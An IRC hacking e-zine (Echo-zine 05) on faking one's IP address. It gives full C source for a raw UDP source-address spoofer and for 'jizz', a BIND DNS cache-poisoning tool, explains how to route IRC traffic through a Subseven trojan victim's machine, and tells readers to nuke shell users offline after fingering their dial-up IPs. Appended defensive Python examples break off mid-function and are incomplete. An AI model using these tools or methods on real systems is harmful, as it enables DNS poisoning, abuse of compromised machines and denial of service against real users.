____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/ .OR.ID

ECHO-ZINE RELEASE 05

Author: basher13 || basher13@stardawn.net
Online @ www.echo.or.id :: http://ezine.echo.or.id

#Include :

1.Chapter:
 -.Fake IP address
 -.Getting proxies and wingates
 -.Shell providers
 -.mIRC
2.Chapter:
 -.Spoofing the IP through mIRC 5.6
3.Chapter:
 -.WinBNC IP spoof
 -.Subseven trojan
4.Chapter:
 -.BNC spoof
 -.Linux/Unix spoof
5.Chapter:
 -.IRC telnet
 -.Fake vhost
6.Chapter:
 -.IRC Daemon
 -.Nukes Shell Account (english)
7.Chapter:
 -.A look at Phone Hack tools

..#1.Chapter

*[ Fake IP address ].

Many people keep asking how to use IRC completely anonymously, how to fake their IP address, or how to get a host such as "gates.is.owned.a0l.hax0rz.com", "31337.unixshell.com", or a unique one like "bahagianya.hatiku.ketika.melihat.kekasihku.tersenyum.org". Here is a short explanation:

*[ Getting proxies and wingates ].

The easiest way to fake an IP address is to reach the IRC server through proxies and wingates. Enter the proxy or wingate in mIRC's port settings; if you do not have mIRC yet, you can find it at http://www.mirc.co.uk or http://www.mirc.net. In mIRC, open the firewall settings (Options -> Connect -> Firewall). Make sure you are using a proxy server and have checked the "Proxy" protocol first; if you are using a SOCKS4 firewall, select the "sock4" protocol, and likewise for the others.

Now you are surely asking where to get proxies and wingates. Proxies are easier to use than wingates, which are too risky. For a proxy list, look at "http://www.cyberarmy.com/lists/proxy", or easier still, search google.com (http://www.google.com) for "proxy list". Every proxy or wingate you find has to be tested first to confirm that it can be used to bounce IRC.

*[ Shell providers ]

Here you have to pay for a shell for your vhost. How do you find a 'shell or vhost'? I currently use a shell/vhost that costs Rp.30.000,00 per month. For a shell provider or vhost, go to "http://www.unishell.com" or search http://www.yahoo.com or http://www.google.com for "shell provider".

*[ mIRC ]

Once you have a shell account for your vhost, open mIRC and connect to the shell provider (/server server2.unishell.com 51121). That is only an example from the shell provider I use, with the unishell.com server. Port 51121 is where they run the BNC daemon or psyBNC. Next you are asked for a password, which you give by typing /quote pass [your password]. After giving the password, type "/bvhost vhost.nama.yang.anda.inginkan" (the vhost name you want). By typing 'JUMP', your IP switches to that vhost (e.g. basher13@31337.unixshell.com, previously basher13@208.37.46.1xx). 208.37.46.1xx is the IP number of the shell provider. Next, type "/whois [your nick]" in the mIRC window. To connect to an IRC server, type 'JUMP irc.server.com 6667' and press Enter.

=========================================================================================
 mIRC                                                                                   |
=========================================================================================
-Welcome to psybnc,You'have IRC Client doesn't support password,please type "quote PASS " to connect.

--> type " /quote pass [your password] "
<-- psyBNC 'password accepted'
--> type " /bvhost vhost.nama.yang.anda.inginkan "
<-- psyBNC " vhost has changed to vhost.nama.yang.anda.inginkan ,JUMP to changed sever"
---> type " JUMP"
<-- psyBNC "host has changed to basher13@31377.unixshell.com "
---> type "/whois basher13 "
<--- Chanserv " basher13 is basher13@31337.unixshell.com
     Has using irc.webmaster.com
     His identify him self
     has idle in 12 minutes , 3 seconds
     End whois "
==========================================================================================

..#2.Chapter

*[ Spoofing the IP through mIRC 5.6 ]

Open mIRC and choose the options menu to reach the firewall settings (ALT + O). In the category tree find "+ connect" and click it to open the firewall settings. Select the sub-item 'firewall' and make sure the 'Use SOCKS firewall' box is checked (x). In the 'hostname' box, type the IP/hostname of the firewall, for example firewall.yangpunya.com. Leave the USER ID and PASSWORD boxes empty, set the port to 1080, and click 'ok'. Then type '/server.. yang.anda.mau 6667'.

:localhost 311 ^FBI^ ^FBI^ ~FBI firewall.someone.com * : basher 13
:localhost 312 ^FBI^ ^FBI^ localhost :test server
:localhost 317 ^FBI^ ^FBI^ 9 932030074 :seconds idle, signon time
:localhost 318 ^FBI^ ^FBI^ :End of /WHOIS list.

Now you can see that my host has changed to firewall.someone.com, where before it was 31337.unixshell.com. To get a firewall list, try Astalavista (http://www.astalavista.com), or a search engine such as google.com, yahoo.com, etc., with the query "firewall list".

Explanation of the lines shown above:

~FBI 31337.unixshell.com * :basher13
 |          |                  |_ The user's real name
 |          |_ User host or IP
 |_ Username (set by IdentD).

Second line:

localhost :test server
    |          |_ Message from the server (set by the server admin)
    |_ Server used to connect

Third line:

9 932030074 :seconds idle, signon time
|     |_ When the user signed in / logged in to the server
|_ How long the user has been on that server

Last line:

:End of /WHOIS list.
    |_ Shows that there is no more data.

Once your IP address is known, an attacker can launch a Denial of Service (DoS) attack against you, such as winnuke, ComNUKE, or the lovely ping flood, which can push your bandwidth beyond its capacity or reboot your computer.

..#3.Chapter

*[ WinBNC IP spoof ]

You need a partner/friend so that you can bounce through their IP on IRC. They must have the WinBNC daemon software (if their operating system is not Windows, they need BNC, ezBNC, etc.). The daemon is built for other platforms as well; you connect through their computer and their IP address. Find it with a search engine (www.google.com, www.yahoo.com) by typing "winbnc etc". Before your friend runs the daemon, you must both be clear about the port, the password and the admin password. It is also recommended to specify the list of IPs/DNS names that may use the BNC (the list must include your IP so that you can connect directly to your friend's BNC). This configuration is edited in bnc.cfg with Notepad or another text editor. Now have your partner/friend open an MS-DOS prompt, go to the directory where WinBNC was unzipped, and run bnc.exe. They then give you the IP address, the WinBNC password and the port. You use those values in IRC, e.g.:

/server 144.64.24.100 namaport password

After you are connected to your friend's WinBNC, type

/quote conn irc.nama.server ircserversport password

(and also make sure your friend does not have a vhost, so that you connect through the IP)

*[ Subseven trojan ]

Another way to spoof your IP is to use the Subseven trojan. Here it is used to redirect all data from its origin (e.g. the IRC server), so that the server never communicates with you, only with the SubSeven victim. Once SubSeven is on the victim, connect with the SubSeven client and set up a port redirect. You must fill in the input port, the output port and the output host. The input port is the port you connect to for IRC, the output port is the port of the IRC server, and the output host is the final server you connect to. Enter '2000' as the input port, '6667' as the output port, and 'server.yang.dituju' (the target server) as the output host, e.g. irc.webmaster.com. You are now done with Subseven; close it and open your IRC client. Type the command:

/server sub7korbanip inputportyangandatahu (for ex. /server 212.213.100.2 2000)

You are now on IRC, connected through the Subseven victim so that your IP is changed/hidden. To check, type in the main mIRC window:

/whois nama anda

..#4.chapter

*[ WinBNC ]

BNC is software that runs on Unix computers. For example, there is a BNC at bnc.shell.com port 1234; you type /server bnc.shell.com 1234 and see something like:

-BNC- Please type your password via /quote pass

Hmm... what is the password? If you know/have the password, type '/quote pass password'. If you do not have the password, ask the owner of the BNC, and also ask whether they have a vhost; if they do, just type '/quote vip nama.host.anda'. Type /conn irc.nama.server to connect to the target server.

*[ Linux/Unix spoof ]

All you need to do is compile the following for Linux/Unix.

1.Arnudp.c

// send a UDP datagram with a chosen source/destination address/port
// If the IP_HDRINCL option is not available, the source address will be
// set to the real address. This works on SunOS 5.4.
// It should compile fine with an ANSI compiler (such as gcc) under
// Linux and SunOS 4.1, but with SunOS 5.4 you have to specify the
// libraries on the command line:
// /usr/ucb/cc -o arnudp arnudp001.c -lsocket -lnsl
// This works when run as root!

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct sockaddr sa;

main(int argc,char **argv)
{
  int fd;
  int x=1;
  struct sockaddr_in *p;
  struct hostent *he;
  u_char gram[38]=
  {
    0x45, 0x00, 0x00, 0x26,
    0x12, 0x34, 0x00, 0x00,
    0xFF, 0x11, 0, 0,
    0, 0, 0, 0,
    0, 0, 0, 0,
    0, 0, 0, 0,
    0x00, 0x12, 0x00, 0x00,
    '1','2','3','4','5','6','7','8','9','0'
  };

  if(argc!=5)
  {
    fprintf(stderr,"usage: %s sourcename sourceport destinationname destinationport\n",*argv);
    exit(1);
  };

  if((he=gethostbyname(argv[1]))==NULL)
  {
    fprintf(stderr,"can't resolve source hostname\n");
    exit(1);
  };
  bcopy(*(he->h_addr_list),(gram+12),4);

  if((he=gethostbyname(argv[3]))==NULL)
  {
    fprintf(stderr,"can't resolve destination hostname\n");
    exit(1);
  };
  bcopy(*(he->h_addr_list),(gram+16),4);

  *(u_short*)(gram+20)=htons((u_short)atoi(argv[2]));
  *(u_short*)(gram+22)=htons((u_short)atoi(argv[4]));

  p=(struct sockaddr_in*)&sa;
  p->sin_family=AF_INET;
  bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));

  if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
  {
    perror("socket");
    exit(1);
  };

#ifdef IP_HDRINCL
  fprintf(stderr,"we have IP_HDRINCL :-)\n\n");
  if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
  {
    perror("setsockopt IP_HDRINCL");
    exit(1);
  };
#else
  fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n");
#endif

  if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1)
  {
    perror("sendto");
    exit(1);
  };

  printf("datagram sent without error:");
  for(x=0;x<(sizeof(gram)/sizeof(u_char));x++)
  {
    if(!(x%4)) putchar('\n');
    printf("%02x",gram[x]);
  };
  putchar('\n');
}

/************************************************************************/

2.Jizz (ip host spoofer)

#define VERSION ".01b"

#include
#include
#include
#include
#include
#include
#include
#include

#define MAXBUFSIZE 64*1024

#define DC_A 1
#define DC_NS 2
#define DC_CNAME 5
#define DC_SOA 6
#define DC_WKS 11
#define DC_PTR 12
#define DC_HINFO 13
#define DC_MINFO 14
#define DC_MX 15
#define DC_TXT 16

typedef struct {
  unsigned short id;

  unsigned char rd:1;      /* recursion desired */
  unsigned char tc:1;      /* truncated message */
  unsigned char aa:1;      /* authoritive answer */
  unsigned char opcode:4;  /* purpose of message */
  unsigned char qr:1;      /* response flag */

  unsigned char rcode:4;   /* response code */
  unsigned char unused:2;  /* unused bits */
  unsigned char pr:1;      /* primary server required (non standard) */
  unsigned char ra:1;      /* recursion available */

  unsigned short qdcount;
  unsigned short ancount;
  unsigned short nscount;
  unsigned short arcount;
} dnsheaderrec;

typedef struct {
  unsigned short labellen;
  char label[256];
  unsigned short type;
  unsigned short class;
  unsigned long ttl;
  unsigned short buflen;
  char buf[256];
} dnsrrrec;

typedef struct {
  dnsheaderrec h;

  dnsrrrec qd[20];
  dnsrrrec an[20];
  dnsrrrec ns[20];
  dnsrrrec ar[20];
} dnsrec;

char *dnssprintflabel(char *s, char *buf, char *p);
char *dnsaddlabel(char *p, char *label);
void dnstxt2rr(dnsrrrec *rr, char *b);
void dnsbuildpacket(dnsrec *dns, short qdcount, short ancount, short nscount, short arcount, ...);
char *dnsaddbuf(char *p, void *buf, short len);
int dnsmakerawpacket(dnsrec *dns, char *buf);

unsigned long rev_long(l)
unsigned long l;
{
  unsigned long i = 0;
  int n = sizeof(i);

  while (n--) {
    i = (i << 8) | (l & 255);
    l >>= 8;
  }
  return i;
}

char *dnssprintflabel(char *s, char *buf, char *p)
{
  unsigned short i,len;
  char *b=NULL;

  len=(unsigned short)*(p++);
  while (len) {
    while (len >= 0xC0) {
      if (!b)
        b=p+1;
      p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000);
      len=(unsigned short)*(p++);
    }

    for (i=0;ilabel,tok[0]);
  rr->labellen=p-rr->label;

  i=1;

  if (isdigit(*p))
    rr->ttl=htonl(atol(tok[i++]));
  else
    rr->ttl=htonl(DEFAULTTTL);

  if (strcmp(tok[i],"IN") == 0)
    i++;

  rr->class=htons(1);

  if (strcmp(tok[i],"A") == 0) {
    i++;
    rr->type=htons(DC_A);
    if (i < numt) {
      inet_aton(tok[i],rr->buf);
      rr->buflen=4;
    } else
      rr->buflen=0;
    return;
  }

  if (strcmp(tok[i],"CNAME") == 0) {
    i++;
    rr->type=htons(DC_CNAME);
    if (i < numt) {
      p=dnsaddlabel(rr->buf,tok[i]);
      rr->buflen=p-rr->buf;
    } else
      rr->buflen=0;
    return;
  }

  if (strcmp(tok[i],"NS") == 0) {
    i++;
    rr->type=htons(DC_NS);
    if (i < numt) {
      p=dnsaddlabel(rr->buf,tok[i]);
      rr->buflen=p-rr->buf;
    } else
      rr->buflen=0;
    return;
  }

  if (strcmp(tok[i],"PTR") == 0) {
    i++;
    rr->type=htons(DC_PTR);
    if (i < numt) {
      p=dnsaddlabel(rr->buf,tok[i]);
      rr->buflen=p-rr->buf;
    } else
      rr->buflen=0;
    return;
  }

  if (strcmp(tok[i],"MX") == 0) {
    i++;
    rr->type=htons(DC_MX);
    if (i < numt) {
      p=rr->buf;
      *((unsigned short *)p)=htons(atoi(tok[i++]));
      p+=2;
      p=dnsaddlabel(p,tok[i]);
      rr->buflen=p-rr->buf;
    } else
      rr->buflen=0;
    return;
  }
}

void dnsbuildpacket(dnsrec *dns, short qdcount, short ancount, short nscount, short arcount, ...)
{
  int i;
  va_list va;

  dns->h.qdcount=htons(qdcount);
  dns->h.ancount=htons(ancount);
  dns->h.nscount=htons(nscount);
  dns->h.arcount=htons(arcount);
  dns->h.rcode=0;

  va_start(va, arcount);
  for (i=0;iqd[i],va_arg(va, char *));
  for (i=0;ian[i],va_arg(va, char *));
  for (i=0;ins[i],va_arg(va, char *));
  for (i=0;iar[i],va_arg(va, char *));
  va_end(va);
}

char *dnsaddbuf(char *p, void *buf, short len)
{
  memcpy(p,buf,len);
  return(p+len);
}

int dnsmakerawpacket(dnsrec *dns, char *buf)
{
  char *p;
  int i;
  unsigned short len;

  memcpy(buf,&dns->h,sizeof(dnsheaderrec));

  p=buf+sizeof(dnsheaderrec);

  /********** Query ***********/
  for (i=0;ih.qdcount);i++) {
    p=dnsaddbuf(p,dns->qd[i].label,dns->qd[i].labellen);
    p=dnsaddbuf(p,&dns->qd[i].type,2);
    p=dnsaddbuf(p,&dns->qd[i].class,2);
  }

  /********** Answer ***********/
  for (i=0;ih.ancount);i++) {
    p=dnsaddbuf(p,dns->an[i].label,dns->an[i].labellen);
    p=dnsaddbuf(p,&dns->an[i].type,2);
    p=dnsaddbuf(p,&dns->an[i].class,2);
    p=dnsaddbuf(p,&dns->an[i].ttl,4);
    len=htons(dns->an[i].buflen);
    p=dnsaddbuf(p,&len,2);
    p=dnsaddbuf(p,dns->an[i].buf,dns->an[i].buflen);
  }

  /********** Nameservers ************/
  for (i=0;ih.nscount);i++) {
    p=dnsaddbuf(p,dns->ns[i].label,dns->ns[i].labellen);
    p=dnsaddbuf(p,&dns->ns[i].type,2);
    p=dnsaddbuf(p,&dns->ns[i].class,2);
    p=dnsaddbuf(p,&dns->ns[i].ttl,4);
    len=htons(dns->ns[i].buflen);
    p=dnsaddbuf(p,&len,2);
    p=dnsaddbuf(p,dns->ns[i].buf,dns->ns[i].buflen);
  }

  /********** Additional ************/
  for (i=0;ih.arcount);i++) {
    p=dnsaddbuf(p,dns->ar[i].label,dns->ar[i].labellen);
    p=dnsaddbuf(p,&dns->ar[i].type,2);
    p=dnsaddbuf(p,&dns->ar[i].class,2);
    p=dnsaddbuf(p,&dns->ar[i].ttl,4);
    len=htons(dns->ar[i].buflen);
    p=dnsaddbuf(p,&len,2);
    p=dnsaddbuf(p,dns->ar[i].buf,dns->ar[i].buflen);
  }

  return(p-buf);
}

void main(int argc, char *argv[])
{
  int sock, fromlen, numread, len, query;
  struct sockaddr_in sa, from, to;
  struct in_addr rev;
  char *buf, *sendbuf;
  char *domainnamebuf;
  dnsheaderrec *dns;
  char *p;
  dnsrec dnsh;

  char *beginhost_QD,
       *beginhost_A, *beginhost_srch;
  char *fakenshost_A, *fakens_DOM;
  char *spoofedip_A, *spoofedip_PTR, *spoofedip_rev;

  printf("jizz %s -- dns spoofer (BIND cache vuln.)\n",VERSION);
  printf("by nimrood\n\n");

  if (argc != 7) {
    printf("usage: \n%s \n",argv[0]);
    printf(" beginhost : requested to initiate false caching, ex: begin.ib6ub9.com\n");
    printf(" fakenshost : server name to answer false PTR's, ex: ns.ib6ub9.com\n");
    printf(" fakensip : IP of server name to answer false PTR's, ex: 205.160.29.19\n");
    printf(" fakensdom : domain name false name server controls, ex: ib6ub9.com\n");
    printf(" spoofedip : IP of machine you want to spoof from, ex: 204.154.2.93\n");
    printf(" spoofedhost: name you want to spoof, ex: teak.0wns.j00\n\n");
    exit(-1);
  }

  if ((beginhost_QD = malloc((strlen(argv[1]))+5+1)) == NULL) {
    perror("malloc");
    exit(-1);
  }
  if ((beginhost_A = malloc(strlen(argv[1])+15+1)) == NULL) {
    perror("malloc");
    exit(-1);
  }
  if ((beginhost_srch = malloc(strlen(argv[1])+1+1)) == NULL) {
    perror("malloc");
    exit(-1);
  }
  if ((fakenshost_A = malloc(strlen(argv[2])+strlen(argv[3])+6+1)) == NULL) {
    perror("malloc");
    exit(-1);
  }
  if ((fakens_DOM = malloc(strlen(argv[4])+strlen(argv[2])+4+1)) == NULL) {
    perror("malloc");
    exit(-1);
  }
  if ((spoofedip_A = malloc(strlen(argv[6])+strlen(argv[5])+6+1)) == NULL) {
    perror("malloc");
    exit(-1);
  }
  if ((spoofedip_PTR = malloc(strlen(argv[5])+strlen(argv[6])+21+1)) == NULL) {
    perror("malloc");
    exit(-1);
  }
  if ((spoofedip_rev = malloc(strlen(argv[5])+1)) == NULL) {
    perror("malloc");
    exit(-1);
  }
  if ((buf = malloc(MAXBUFSIZE)) == NULL) {
    perror("malloc");
    exit(-1);
  }
  if ((sendbuf = malloc(MAXBUFSIZE)) == NULL) {
    perror("malloc");
    exit(-1);
  }
  if ((domainnamebuf = malloc(MAXBUFSIZE)) == NULL) {
    perror("malloc");
    exit(-1);
  }

  if ((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
    perror("socket");
    exit(-1);
  }

  beginhost_QD = strcpy(beginhost_QD,argv[1]);
  beginhost_QD = strcat(beginhost_QD, " IN A");

  beginhost_A = strcat(strcpy(beginhost_A,beginhost_QD),
                       " 127.0.0.1");

  beginhost_srch = strcat(strcpy(beginhost_srch,argv[1]), ".");
  printf("%s\n",beginhost_srch);

  fakenshost_A = strcat(strcpy(fakenshost_A,argv[2]), " IN A ");
  fakenshost_A = strcat(fakenshost_A, argv[3]);

  fakens_DOM = strcat(strcpy(fakens_DOM,argv[4]), " IN NS ");
  fakens_DOM = strcat(fakens_DOM,argv[2]);

  spoofedip_A = strcat(strcpy(spoofedip_A,argv[6]), " IN A ");
  spoofedip_A = strcat(spoofedip_A,argv[5]);

  rev.s_addr = rev_long(inet_addr(argv[5]));
  spoofedip_PTR = strcat(strcpy(spoofedip_PTR,(char *)inet_ntoa(rev.s_addr)), ".IN-ADDR.ARPA IN PTR ");
  spoofedip_PTR = strcat(spoofedip_PTR,argv[6]);

  printf("%s\n%s\n%s\n%s\n%s\n%s\n",
         beginhost_QD,beginhost_A,fakenshost_A,fakens_DOM,spoofedip_A,spoofedip_PTR);

  sa.sin_family = AF_INET;
  /* sa.sin_addr.s_addr = inet_addr(DEFAULTBINDHOST); */
  sa.sin_addr.s_addr = INADDR_ANY;
  sa.sin_port = htons(53);

  if (bind(sock, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
    perror("bind");
    exit(-1);
  }

  setvbuf(stdout,NULL,_IONBF,0);

  while (1) {
    fromlen=sizeof(from);
    if ((numread = recvfrom(sock, buf, MAXBUFSIZE, 0, (struct sockaddr *)&from, &fromlen)) < 0) {
      perror("recvfrom");
      continue;
    }

    /* Kludge to stop that damn router */
    if (from.sin_addr.s_addr == inet_addr("206.126.32.10"))
      continue;

    dns=(dnsheaderrec *)buf;

    if (dns->qr)
      continue;

    p=dnssprintflabel(domainnamebuf,buf,&buf[sizeof(dnsheaderrec)]);
    query=ntohs(*(unsigned short *)p);
    printf("Packet from %s : %d : %s (%d)\n",inet_ntoa(from.sin_addr),ntohs(from.sin_port),domainnamebuf,query);

    if (strcasecmp(domainnamebuf,beginhost_srch) == 0) {
      dnsbuildpacket(&dnsh,1,4,1,1,
                     beginhost_QD,
                     beginhost_A,
                     spoofedip_A,
                     spoofedip_PTR,
                     fakenshost_A,
                     fakens_DOM,
                     "www.yahoo.com IN A 255.255.255.255");
    } else {
      /* Error */
      dnsh.h.rcode=5;
      strcat(domainnamebuf," IN A");
      dnsbuildpacket(&dnsh,1,0,0,0,
                     domainnamebuf);
    }

    dnsh.qd[0].type=htons(query);

    dnsh.h.id=((dnsheaderrec *)buf)->id;
    dnsh.h.qr=1;
    dnsh.h.aa=1;

    len=dnsmakerawpacket(&dnsh,sendbuf);

    to.sin_family=AF_INET;
    to.sin_addr.s_addr=from.sin_addr.s_addr;
    to.sin_port=from.sin_port;

    if (sendto(sock,sendbuf,len,0,(struct sockaddr *)&to,sizeof(to)) < 0) {
      perror("sendto");
      continue;
    }
  }
}

..#5.Chapter

*[ IRC Telnet ]

Open your telnet client, or type 'telnet' in 'Run' from the 'Start' menu.

==============================================================================
==============================================================================
Welcome to Microsoft Telnet Client

Escape Character is 'CTRL+]'

Microsoft Telnet> o ( to ) irc.namaserver.com :6667
Connecting To irc.webmaster.com...
Connected

Microsoft Telnet>

--> type 'Nick' to set your nickname
--> type "USER username host server", your real name, and the host and server used to connect.

* nick ^basher13^
NOTICE ^basher13^ :*** If you are having problems connecting due to ping timeouts, please type /notice E3AA3478 nospoof now.
PING :E3AA3478
* user ^basher13^ 127.0.0.1 localhost :The Cyber God
:localhost 001 ^basher13^ :Welcome to the DALnet IRC Network ^basher13^!~basher13@31337.unixshell.com
:localhost 002 ^basher13^ :Your host is localhost[31337.unixshell.com], running version dal4.6.7.DreamForge.win32
:localhost 003 ^basher13^ :This server was created Fri Jul 24 07:48:52 1998
:localhost 004 ^basher13^ localhost dal4.6.7.DreamForge.win32 oiwsghOkcfrRaAb biklmnopstvR
:localhost 005 ^basher13^ NOQUIT TOKEN WATCH=128 SAFELIST :are available on this server
:localhost 251 ^basher13^ :There are 0 users and 0 invisible on 1 servers
:localhost 253 ^basher13^ 4 :unknown connection(s)
:localhost 255 ^basher13^ :I have 0 clients and 0 servers
:localhost 265 ^basher13^ :Current local users: 0 Max: 0
:localhost 266 ^basher13^ :Current global users: 0 Max: 0
:localhost 422 ^basher13^ :MOTD File is missing
:^basher13^ MODE ^basher13^ :+iw
....
ok
==============================================================================

*[ Fake vhost ]

By now you probably already have a shell account; if not, read *[ Shell providers ] in ..#1.Chapter to get a shell provider along with a vhost. Open mIRC and type:

=========================================================================================
 mIRC                                                                                   |
=========================================================================================
-Welcome to psybnc,You'have IRC Client doesn't support password,please type "quote PASS " to connect.

--> type " /quote pass [your password] "
<-- psyBNC 'password accepted'
--> type " /bvhost 208.37.46.xxx"

(208.37.46.xxx) is the IP number of the shell provider, used to create the fake vhost.

- Below are some vhosts that are already registered:

<-- psyBNC " vhost has changed to 208.37.46.xxx ,JUMP to changed sever"
---> type " JUMP" to change to, or create, the fake vhost from the server.

After the server has changed, type ' /whois namanickanda' (your nick) in the mIRC window. You will see that your IP/vhost has changed. To make sure, you can type '/dns 208.37.46.2xx'; use that shell for your vhost.
========================================================================================

..#6.Chapter

*[ IRC daemon ]

Talking to the IRC daemon directly is an easy way to learn how the protocol works, and also to spoof your IP through telnet from a shell account where you have no IRC client.

[Connecting to the IRC daemon]

Telnet/netcat (yep... you are using a raw socket) to the IRC port (6667/6668..etc)

eg <:> telnet irc.dal.net 6667

Give a nick and username so that you are recognized once you are connected, using the user command in the form "user ".

eg <:> user nobody localhost localhost :I'm nobody
       nick nobody

!remember!
If at any time you receive something like this:

ping :1234567 or ping :192.0.0.1 <-- an IP address

you must send the message back like this:

eg <:> pong :1234567 or pong :192.0.0.1

If you do not answer with pong promptly, the server disconnects you.

*[ Nukes Shell Account ] {english version}

If you're using Windows, you should download a program that will allow you to finger a server. Cyberkit is a good program, for it has Ping, Finger, Traceroute, etc. Get it at http://www.ping.be/cyberkit/cyber.zip, or go find one of your own. There are hundreds to choose from. (No, we're not being endorsed by Cyberkit, it's just a kickass proggie.)

Most shell account users will log in from a dial-up account, and if finger is running on their shell, it should display the dial-up IP address. Finger the server and once you know this, use your nuker to disconnect them from their shell by replacing the IRC server with their shell account address, and use the IP you found through finger as the client. Use ports 22 24 as the server ports, in place of 6660 6669. Port 23 is the default telnet port, so nuking from 22 to 24 will effectively disconnect them from their shell account. This usually causes your target to quit IRC with the "Where did my controling terminal go?" quit message. It's pretty funny when it works.

..#7.chapter

*[ A look at Phone Hack tools ]

=======================================================================================
 C:\WINDOWS\System32\Phone Hack Tools\Temp\Hoax.exe                                   |
=======================================================================================
Dialing NORAD Defense Network...
-RING-
-RING-
**CONNECT**

NORAD Defense Network
NORTH AMERICAN AIR DEFENSE COMMAND CONTROL SYSTEM

N O R A D  S Y S T E M  C O M C O N 4 . . .
CONNECTED 03/15/02 13:28:51 P

AUTHORITY CODE ==>XXXXXXX
PROCESSING.....

N O R A D  P R I M E  A C C E S S
PLEASE STAND BY.....

WARNING!!!!!
INCOMING CALLERS SUBJECT TO UNITED STATES MILITARY TRIBUNAL JUSTICE SYSTEM.
FOREIGN ACCESS STRICTLY PROHIBITED.
ACCESS IS ON A NEED TO KNOW, EYES-ONLY BASIS FOR ALL BUT COMMAND AUTHORITY.
AT THIS POINT IMPROPER IDENTIFICATION WILL RESULT IN AUTOMATIC SURVEILLANCE
OF CONNECTING TELEPHONE LINE AND INFORMATION SO GATHERED WILL BE PROVIDED TO
THE PROPER LOCAL POLICE AND GOVERNMENTAL AGENCIES...................

ACKNOWLEDGED? (Y/N) >y

N O R A D  P R I M E  A C C E S S
PLEASE ENTER YOUR EYES-ONLY CODE =>8207512
Verifying...
CODE ENTERED IMPLIES COMMAND AUTHORITY
ENTER YOUR VERIFICATION AS GIVEN IN...
>>>>>BOOK 12RY-OLIVE<<<<<
=>xxxxxxxxxxx
Verifying...
PROCESS A..COMPARING..ACCEPTED!

SIR, COMCON4 REPORTS UPTIME VERIFIED FOR NEXT ONE HOUR.
N O R A D COMMAND CENTER CAN BE REACHED AT ANY TIME WITH PASSWORDS AS
PROVIDED IN THE LANGLEY PROTOCOLS.

ENTERING DIRECT COMMAND MODE....
ENTER INTERNAL AUTHORIZATION CODE =>8207512
SEARCHING FOR SUBPROGRAM........RUNNING 8207512 ON CPU 4

PLEASE DECODE THE FOLLOWING:
9 6 4 7 0 7 2 8 9 5 4 2 6 0 6 4 5 1 7 5 7 5 1 5 3 9 8 8 9 7 3 1 9 1 5 6 4 1 2 7 4 4 3 5 0 3 0 2 4 0 0 7 8 2 9 6 8 2 0 6
USING BOOK 7 GREY
MAKE DECODED ENTRY AND PRESS RETURN =>
==========================================================================================
- .EOF.-
DISCLAIMER: Distribution of or allowing access to this program by uncleared
individuals is strictly prohibited under penalty of federal law.
Print: 'CTRL+P'                                                  1:29 PM 3/15/2002

***************************************************************
* E-zine Name....: Stardawn#2                                 *
* Author.........: basher13                                   *
* Release Date...: 15 March 2004                              *
* Filename.......: Stardawn#2.txt                             *
* Web Site.......: http://www.stardawn.net                    *
***************************************************************
*                 Yeah basher13 RuleZ AgaiN!                  *
***************************************************************
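
The WHOIS numerics broken down in Chapter 2 and the PING/PONG rule from Chapter 6, as an added example that is not part of the original e-zine: a small parser, run over the 311/312/317/318 lines shown on the page, that pulls out the fields an IRC operator or log reviewer reads. The function names are this example's own, and reading a leading ~ in the username as "identd did not answer" is the common ircd convention, assumed here.

```python
from datetime import datetime, timezone

# WHOIS reply lines as printed in Chapter 2 of the page.
SAMPLE_WHOIS = [
    ":localhost 311 ^FBI^ ^FBI^ ~FBI firewall.someone.com * : basher 13",
    ":localhost 312 ^FBI^ ^FBI^ localhost :test server",
    ":localhost 317 ^FBI^ ^FBI^ 9 932030074 :seconds idle, signon time",
    ":localhost 318 ^FBI^ ^FBI^ :End of /WHOIS list.",
]


def parse_line(line):
    """Split one raw IRC line into (prefix, command, params)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    # Everything after the first " :" is one trailing parameter.
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if sep:
        parts.append(trailing)
    if not parts:
        raise ValueError("empty IRC line")
    return prefix, parts[0].upper(), parts[1:]


def whois_summary(lines):
    """Collect the fields of a WHOIS reply (numerics 311, 312, 317, 318)."""
    info = {"complete": False}
    for raw in lines:
        _, cmd, p = parse_line(raw)
        if cmd == "311" and len(p) >= 6:
            # <requester> <nick> <username> <host> * :<real name>
            info.update(nick=p[1], user=p[2], host=p[3],
                        realname=p[5].strip(),
                        # Assumption: "~" means no identd reply was received.
                        ident_verified=not p[2].startswith("~"))
        elif cmd == "312" and len(p) >= 4:
            # <requester> <nick> <server> :<server info>
            info.update(server=p[2], server_info=p[3])
        elif cmd == "317" and len(p) >= 4:
            # <requester> <nick> <idle seconds> <signon epoch> :<labels>
            info.update(idle_seconds=int(p[2]),
                        signon=datetime.fromtimestamp(int(p[3]), timezone.utc))
        elif cmd == "318":
            info["complete"] = True
    return info


def keepalive_reply(raw):
    """Return the PONG line owed for a server PING, or None for other lines."""
    _, cmd, p = parse_line(raw)
    if cmd == "PING" and p:
        return "PONG :" + p[-1]
    return None


if __name__ == "__main__":
    for key, value in whois_summary(SAMPLE_WHOIS).items():
        print(key, "=", value)
    print(keepalive_reply("PING :E3AA3478"))
```

The host in the 311 line is only the address that opened the connection to the server, so for a client behind a proxy or bouncer it names the relay and says nothing about the machine behind it.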
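
The reply assembled in the Jizz listing of Chapter 4 carries records that have nothing to do with the question asked, which is what a resolver's bailiwick check rejects. Added example, not part of the original e-zine or of jizz: it parses a constructed response laid out like the listing's dnsbuildpacket() call, filled with the placeholder values from the tool's own usage text, and returns the records a resolver should refuse to cache. All function names and the simplified rule (answers must match the question name, no CNAME chasing) are assumptions of this example.

```python
import socket
import struct

TYPES = {1: "A", 2: "NS", 12: "PTR"}


def encode_name(name):
    """Encode a dotted name as uncompressed DNS labels."""
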